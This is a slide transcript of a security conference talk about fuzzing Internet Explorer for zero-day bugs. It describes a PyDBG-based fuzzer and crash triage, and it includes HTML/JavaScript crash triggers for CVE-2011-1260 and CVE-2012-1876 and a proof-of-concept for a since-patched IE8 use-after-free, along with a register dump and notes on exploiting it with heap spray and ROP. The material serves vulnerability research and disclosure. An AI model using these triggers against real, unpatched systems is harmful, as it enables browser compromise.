0-Day 輕鬆談 - Happy Fuzzing Internet Explorer

Transcript

1. 0-Day 輕鬆談 (0-Day Easy Talk)

2. 0-Day 甘苦談 (0-Day WTF Talk)

3. 這是一場簡單的演講 This is an Easy Talk

4. 分享一些我的 Fuzzing 心得 Share Some Fuzzing Review of Mine

5. 以及很順便的丟個 0-Day 出來 And Disclosed a 0-Day in Passing

6. 大家好 Hello, Everyone

7. 我是 Orange This is Orange Speaking

8. 現任大學生 I am a College Student, Now

9. CHROOT.org 成員 Member of CHROOT.org

10. DevCo.re 打工中 Part-Time Work at DevCo.re

11. 揭露過一些弱點 Disclosed Some Vulnerabilities cve 2013-0305 cve 2012-4775 (MS12-071)

12. About Me •  蔡政達 aka Orange •  2009 台灣駭客年會競賽 冠軍

    •  2011, 2012 全國資安競賽 金盾獎冠軍 •  2011 東京 AVTOKYO 講師 •  2012 香港 VXRLConf 講師 •  台灣 PHPConf, WebConf, PyConf 講師 •  專精於 –  駭客攻擊手法 –  Web Security –  Windows Vulnerability Exploitation

13. 如果對我有興趣可以到 blog.orange.tw If You are Interesting at Me. You Can

    Visit blog.orange.tw

14. 我專注於

15. 但今天來聊聊 0-Day 以及 Fuzzing (不是我專門的領域 QQ) But Today Let's Talk

    About 0-Day and Fuzzing (I am Not Expert in This, But Just Share)

16. Conference-Driven 0-Day n. 名詞 釋義: 為了研討會生 0-Day

17. 在找 0-Day 中的一些筆記 Some Notes in Finding 0-Day

18. 這次我們討論 IE This Time We Talk About IE

19. http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero- days-an-price-list-for-hackers-secret-software-exploits/

20. Hacker's Good Friend

21. 方法 •  White Box – Code Review (IE5.5 Source Code) – 二話不說丟進

    IDA •  Black Box – Fuzzing

22. Fuzzing •  Garbage in Garbage out •  理論上可以找到所有漏洞 – 前提是你有無限的時間…

23. 「時間越多， 0-Day 越多」 -⾙貝拉克.歐巴⾺馬

24. Fuzzing Model Generator Debugger Result Logger

25. http://youtube.com/watch?v=m7Xg-YnMisE

26. Debugger •  Windows Debug API – DebugActiveProcess – WaitForDebugEvent – ContinueDebugEvent – 好麻煩… • 

    快速、客制化的 Debugger

27. PyDBG A Pure Python Windows Debugger Interface

28. Debug a Process >>> import pydbg >>> dbg = pydbg()

    >>> dbg.load( file ) # or dbg.attach( pid ) >>> dbg.run()

29. Set Breakpoint >>> dbg.bp_set( address, callback ) >>> dbg.set_callback( exception_code,

    callback )

30. Memory Manipulation >>> dbg.read( address, length ) >>> dbg.write( address,

    length )

31. Crash Dump Report >>> bin = utils.crash_binning.crash_binning() >>> bin.record_crash( dbg

    ) >>> bin.crash_synopsis()

32. Logger (Filter) •  滿山滿谷的 崩潰 •  不是所有的 Crash 能成 為

    Exploit •  九成以上是 Null Pointer 只能當 DoS 用 –  mov eax, [ebx+0x70] –  ; ebx = 0 •  EIP •  Disassemble –  jmp reg –  call reg –  call [reg + CONST] •  Stack •  SHE Chain

33. EIP = ffffffff !!?

34. 0x50000 = 327680 = (65535 / 2)*10

35. File Generator The Most Important Part of Fuzzing

36. File Generator •  內容越機歪越好，當然還是要符合 Spec – 熟讀 Spec 熟悉 File Structure

    – 想像力是你的超能力

37. Fuzzing 方向 1)  找新型態弱點 (麻煩但可通用) 2)  找已知型態弱點 (快速但有針對性)

38. 新型態弱點 •  試試比較新、或比較少人用的 – HTML5 Canvas – SVG – VML •  cve-2013-2551 /

    VML Integer Overflow / Pwn2own / VUPEN – WebGL •  IE11 Begin to Support

39. 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec

    啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec 啃 Spec

40. 已知型態弱點 •  研究以往的弱點我們可以知道 •  Internet Explorer is Not Good at

    – Parsing DOM Tree – Parsing <TABLE> with <TR> & <TD> – Parsing <TABLE> with <COL> •  CTreeNode & CTableLayout

41. Pseudo Scenario of Use-After-Free 1.  <foo> 2.  <bla id=x> 3. 

    <bar id=y> 4.  …… 5.  </bar> 6.  </bla> 7.  </foo> 1.  <script> 2.  var x = document.getElementById( 'x' ); 3.  var y = document.getElementById( 'y' ); 4.  x.innerHTML = 'AAAA…'; 5.  y.length = 100px; 6.  </script>

42. Ex: CVE-2011-1260 (Not Full Version) 1.  <body> 2.  <script> 3. 

    document.body.innerHTML += "<object …>TAG_1</object>"; 4.  document.body.innerHTML += "<aid='tag_3' style='…'>TAG_3</a>"; 5.  document.body.innerHTML +="AAAAAAA"; 6.  document.body.innerHTML += "<strong style='…'>TAG_11</strong>"; 7.  </script> 8.  </body>

43. Ex: CVE-2012-1876 (Heap Overflow) 1.  <script> setTimeout("trigger();",1); </script> 2.  <TABLE

    style="table-layout: fixed; "> 3.  <col id="132" width="41" span="1" > </col> 4.  </col> 5.  </TABLE> 1.  function trigger() { 2.  var obj_col = document.getElementById("132"); 3.  obj_col.width = "42765"; 4.  obj_col.span = 1000; 5.  }

44. Fuzzing with DOM Tree https://www.facebook.com/zztao •  Using DOM Methods to

    Manipulate Objects –  CreateElement –  removeChild appendChild –  InnerHTML outerText –  createRange –  addEventListener –  select –  …

45. Putting All Together 1)  Randomize HTML Node for Initial 2) 

    Manipulated Nodes with DOM Method ( Can Also Play with CSS at the Same Time)
46. None

47. 「運氣不好， 是⼈人品問題」 -⾙貝拉克.歐巴⾺馬

48. Generally, Single Machine Run Can Find 1 or 2 IE

    0-Day in a Month I Have Successfully Found 0-Days from IE6 to IE9, For IE10+ I Haven't Tried Because I am Too Lazy : (

49. So I Found a 0-Day For HITCON 1)  Work on

    Internet Explore 8 2)  Mshtml.dll 8.0.6001.23501

50. http://www.zdnet.com/ie8-zero-day-flaw-targets-u-s-nuke-researchers-all-versions- of-windows-affected-7000014908/

51. WinXP 還能再戰十年

52. Proof-of-Concept

53. <html>

54. Microsoft is Our Sponsor I Can't Say More Detail Until

    Patched : (

55. Call Stack

56. call edx (e10.950): Access violation - code c0000005 (!!! second

    chance !!!) eax=3dbf00a4 ebx=0019bb30 ecx=037f12c8 edx=085d8b53 esi=0172b130 edi=00000000 eip=085d8b53 esp=0172b100 ebp=0172b11c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 085d8b53 ?? ???

57. Writing Exploit •  Windows Protection – DEP – Luckily If Windows XP

    We Don't Care About ASLR – Luckily It is Not IE10+ that It Hasn't vTable Guard

58. So, Writing Exploit is Easy Heap Spray + ROP Enough

59. Demo

60. http://youtube.com/watch?v=QwKkfUcq_VA

61. 本來故事到這有個美滿的結局 Originally, This Story Have a Happy Ending

62. But 人生最精彩的就是這個 But

63. 0-Day 在 HITCON 前一週被修掉了 Silent Fixed Before a Week of

    HITCON

64. What the

65. Proof-of-Concept 1.  <!DOCTYPE html> 2.  <table> 3.  <tr><legend><span > 4. 

    <q id='e'> 5.  <a align="center"> <th> O </th> </a> 6.  </q> 7.  </span></legend></tr> 8.  </table> 9.  </html> 1.  window.onload = function(){ 2.  var x = document.getElementById('e'); 3.  x.outerText = ''; 4.  }

66. Work on •  mshtml.dll …… # …… •  mshtml.dll …...

    # 2013 / 05 / 14 •  mshtml.dll 8.0.6001.23501 # 2013 / 06 / 11 •  mshtml.dll 8.0.6001.23507 # 2013 / 07 / 09

67. Reference •  VUEPN Blog – http://www.vupen.com/blog/ •  Paimei – https://github.com/OpenRCE/paimei •  Special

    Thank tt & nanika

68. Thanks <[email protected]>